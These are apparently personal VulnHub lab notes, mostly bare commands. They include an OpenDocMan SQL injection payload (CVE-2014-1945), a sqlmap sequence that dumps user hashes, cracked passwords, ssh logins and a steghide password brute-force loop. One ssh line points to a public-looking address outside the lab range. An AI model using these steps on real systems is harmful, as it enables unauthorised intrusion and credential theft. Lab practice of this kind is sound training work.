Getting target(s)
=================
netdiscover -i eth0 -P -r 192.168.56.0/24
nmap -T4 -A 192.168.56.104
/jabc
/jabcd0cs/

admin ?
=======
searchsploit opendocman 1.2.7
cat /usr/share/exploitdb/platforms/php/webapps/32075.txt

Getting a foot in the door - SQLi
=================================

SQL Injection in OpenDocMan: CVE-2014-1945
==========================================
http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user'
sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --dbs
sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D jabcd0cs --tables
sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D jabcd0cs -T odm_user --columns
sqlmap -u 'http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D jabcd0cs -T odm_user --dump

success!

    084e0343a0486ff05530df6c705c8bb4:guest
    b78aae356709f8c31118ea613980954b:webmin1980

ssh guest@114.57.36.194

ssh webmin@192.168.56.104

cat root/flag.txt

VulnHub -- SecTalks
===================
netdiscover -i eth0 -p -r 192.168.56.0/24

open ports;
===========

22     --> ssh
80     --> http (Apache 2.4.7)
2020 --> vsftpd ftp service with anonymous login authorized

dirb http://192.168.56.223

http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/

download 
========

wget -nd -r -l 1 -A jpg http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/
ls -l *.jpg

checking file information;
==========================
for i in $(ls *.jpg) ; do file $i ; echo ; done

checking for interesting data with exiftool;
============================================
for i in $(ls *.jpg) ; do exiftool $i ; echo ; done

checking if any extraneous info at the end of the files;
========================================================
for i in $(ls *.jpg) ; do hd $i | tail -n2 ; echo ; done

checked if only 1 file trailer
==============================
for i in $(ls *.jpg) ; do echo $i ; hd $i | egrep -i 'ff d9|ff  d9' ; echo ; done

checking if any info hidden with steghide without password;
===========================================================
for i in $(ls *.jpg) ; do echo $i ; steghide extract -sf $i -p "" ; done

checking files for steghide info with worst 500 password list;
==============================================================
for x in $(ls *.jpg) ; do bash tools/stegbrute.sh -i $x -w lists/501.txt ; done
